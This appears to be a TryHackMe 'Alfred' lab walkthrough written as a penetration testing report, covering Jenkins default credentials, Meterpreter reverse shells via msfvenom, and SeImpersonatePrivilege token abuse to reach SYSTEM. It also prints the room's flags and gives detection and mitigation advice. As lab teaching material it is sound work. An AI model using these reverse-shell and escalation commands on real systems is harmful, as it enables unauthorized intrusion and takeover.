Share
## https://sploitus.com/exploit?id=0A2230D0-E734-5EAE-9149-EDFB7EBE2C8F
# ๐Ÿฆ‡ TryHackMe: Alfred Walkthrough & Penetration Testing Report


  



  
  
  
  


---

## ๐Ÿ“‘ Table of Contents

- [Overview](#-overview)
- [Objectives](#-objectives)
- [Attack Path Summary](#-attack-path-summary)
- [Vulnerability Findings](#-vulnerability-findings)
- [Step-by-Step Walkthrough](#-step-by-step-walkthrough)
  - [1. Reconnaissance](#1-reconnaissance)
  - [2. Jenkins Enumeration](#2-jenkins-enumeration)
  - [3. Initial Access](#3-initial-access)
  - [4. Privilege Escalation](#4-privilege-escalation)
- [How to Reproduce](#-how-to-reproduce)
- [Detection & Mitigation](#-detection--mitigation)
- [Lessons Learned](#-lessons-learned)
- [References](#-references)
- [Disclaimer](#-disclaimer)

---

## ๐ŸŽฏ Overview

**Alfred** is a Windows-based TryHackMe room named after Batman's loyal butler. It focuses on identifying misconfigured CI/CD pipelines (Jenkins) and abusing Windows token privileges (`SeImpersonatePrivilege`) to achieve full system compromise. This repository documents the complete attack path from external reconnaissance to `NT AUTHORITY\SYSTEM`.

---

## ๐Ÿ Objectives

- Perform comprehensive external enumeration to identify vulnerable services.
- Exploit default credentials on an exposed Jenkins automation server.
- Establish a reliable Meterpreter reverse shell.
- Enumerate Windows token privileges and abuse `SeImpersonatePrivilege` for vertical privilege escalation.
- Document actionable defensive recommendations to secure similar infrastructure.

---

## โš”๏ธ Attack Path Summary (Kill-Chain)

1. **Reconnaissance:** Identified an exposed Jenkins service on port 8080 and an unpatched RDP service (MS12-020).
2. **Initial Access:** Bypassed authentication using default Jenkins credentials (`admin:admin`).
3. **Execution:** Leveraged Jenkins' "Execute Windows batch command" feature to download and execute a PowerShell reverse shell (Nishang).
4. **Privilege Escalation:** Identified `SeImpersonatePrivilege` enabled on the service account.
5. **SYSTEM Access:** Used Metasploit's `incognito` module to impersonate the `BUILTIN\Administrators` token and migrate into `services.exe`.

---

## ๐Ÿšจ Vulnerability Findings

| Vulnerability | Component | Severity | Description |
| :--- | :--- | :--- | :--- |
| **CVE-2012-0002** | RDP (Port 3389) | **Critical** | MS12-020 Remote Code Execution allowing unauthenticated attackers to execute arbitrary code. |
| **CVE-2012-0152** | RDP (Port 3389) | **High** | MS12-020 Denial of Service flaw allowing attackers to crash the system via crafted packets. |
| **Default Credentials** | Jenkins (Port 8080) | **Critical** | Administrative interface exposed with `admin:admin`, granting RCE via build jobs. |
| **Privilege Misconfiguration** | Windows Tokens | **Critical** | Service account running with `SeImpersonatePrivilege`, leading to immediate SYSTEM escalation. |

---

## ๐Ÿ‘ฃ Step-by-Step Walkthrough


1. Reconnaissance

We begin with an `nmap` scan to discover open ports and services on the target.

```bash
nmap 10.112.178.37 -sV -sC --script=vuln -O -Pn
```

**Key Findings:**
- The target is vulnerable to **MS12-020 (CVE-2012-0002)**, an RDP Remote Code Execution vulnerability, and **CVE-2012-0152** (DoS).
- The target exposes a **Jetty 9.4.z-SNAPSHOT** service on port `8080`, running a Jenkins CI/CD server. 

Because MS12-020 RCE exploits can be unstable and cause the server to crash (BSOD), we pivot our focus to the Jenkins server for a more reliable foothold.



2. Jenkins Enumeration

Navigating to `http://:8080`, we are presented with the Jenkins login portal.

We successfully bypass authentication using common default credentials:
- **Username:** `admin`
- **Password:** `admin`

With administrative access, we have the ability to execute arbitrary system commands via Jenkins build jobs. We create a new project and configure a build step:
1. Open the project.
2. Click **Configure**.
3. Scroll to the **Build** section and add an **Execute Windows batch command** step.



3. Initial Access

To establish a reverse connection, we generate a Meterpreter payload using `msfvenom` encoded for PowerShell execution.

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.112.116.54 LPORT=4444 -f psh-cmd
```

This generates a payload string that looks like this:
```powershell
powershell.exe -nop -w hidden -e BASE64_PAYLOAD
```

We start a Metasploit listener to catch the callback:
```bash
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.112.116.54; set LPORT 4444; exploit"
```

Output:
```text
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Sending stage (203846 bytes) to 10.114.178.215
[*] Sending stage (203846 bytes) to 10.114.178.215
meterpreter >
```

We paste the payload into the Jenkins build step and click "Build Now". The reverse shell connects successfully.

**User Flag Extraction:**
```bash
search -f user.txt
```
```text
Found 1 result...
C:\Users\bruce\Desktop\user.txt
```
```bash
cat "C:\Users\bruce\Desktop\user.txt"
```
```text
79007a09481963edf2e1321abd9ae2a0
```



4. Privilege Escalation

Before escalating, we upgrade to a stable Windows executable Meterpreter session to facilitate advanced post-exploitation.

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.114.75.73 LPORT=4443 -f exe -o shell.exe
```

We download and execute this binary, then drop into a system shell to review our Windows token privileges.

```bash
shell
```
```cmd
whoami /priv
```
```text
SeDebugPrivilege Debug programs Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
```

The presence of `SeImpersonatePrivilege` is a critical finding. It allows a process to impersonate any token it can obtain.

We load the `incognito` extension in Metasploit to abuse this privilege:
```bash
load incognito
impersonate_token "BUILTIN\Administrators"
```

Output:
```text
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM

[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
```

We are now running as `NT AUTHORITY\SYSTEM`. To solidify persistence and ensure token stability, we migrate our process to `services.exe`.

**Root Flag Extraction:**
```bash
cat "C:\Windows\System32\config\root.txt"
```
```text
dff0f748678f280250f25a45b8046b4a
```


---

## ๐Ÿ› ๏ธ How to Reproduce

1. Clone this repository.
2. Ensure you have Metasploit and `nmap` installed on your attacking machine.
3. Deploy the TryHackMe Alfred machine.
4. Review the scripts in the `/payloads` directory.
5. Follow the step-by-step walkthrough detailed above.

*(Screenshots and command outputs are available in the `/screenshots` and `/reports` directories).*

---

## ๐Ÿ›ก๏ธ Detection & Mitigation

### Defensive Recommendations:
1. **Change Default Credentials:** Never deploy Jenkins or any CI/CD platform with default credentials (`admin:admin`). Enforce strong password policies and MFA.
2. **Patch Legacy Systems:** The presence of MS12-020 (CVE-2012-0002/0152) indicates a severe lack of patch management. Ensure all internet-facing and internal protocols (like RDP) are updated.
3. **Principle of Least Privilege:** Service accounts running web servers or CI/CD pipelines should **never** be granted `SeImpersonatePrivilege` or `SeDebugPrivilege` unless absolutely strictly required and deeply sandboxed. 
4. **Network Segmentation:** Isolate automation pipelines from critical business networks to prevent lateral movement.

### Detection Engineering:
- Monitor for anomalous child processes spawning from `java.exe` (Jenkins), particularly `cmd.exe` or `powershell.exe`.
- Create alerts for execution of encoded PowerShell commands (`powershell.exe -e ...`).
- Monitor token manipulation events (Event ID 4624/4672) involving `SeImpersonatePrivilege`.

---

## ๐Ÿ“– Lessons Learned

- **CI/CD is a Prime Target:** Because build servers inherently execute code by design, compromising them often leads directly to Remote Code Execution. They must be secured with the same rigor as Domain Controllers.
- **Tokens are Keys to the Kingdom:** Understanding Windows Token architecture is crucial for red teamers. A seemingly low-privileged service account can hold the keys to `SYSTEM` if misconfigured.

---

## ๐Ÿ“š References

- [TryHackMe โ€” Alfred](https://tryhackme.com/room/alfred)
- [Nishang PowerShell Framework](https://github.com/samratashok/nishang)
- [Exploit-DB โ€” Abusing Token Privileges For LPE](https://www.exploit-db.com/papers/42556)
- [Microsoft Access Tokens Documentation](https://learn.microsoft.com/en-us/windows/win32/secauthz/access-tokens)

---

## ๐Ÿ‘ค Author

**Abanoub Ehab** | **BobXploit**
- Offensive Security Researcher & Penetration Tester
- Focused on Red Teaming, Real-world Attack Simulation, and Vulnerability Research.

---

## โš ๏ธ Disclaimer

All information, techniques, and tools documented in this repository are for **educational purposes and authorized penetration testing only**. The author is not responsible for any misuse of this information. Always obtain explicit permission before testing any system.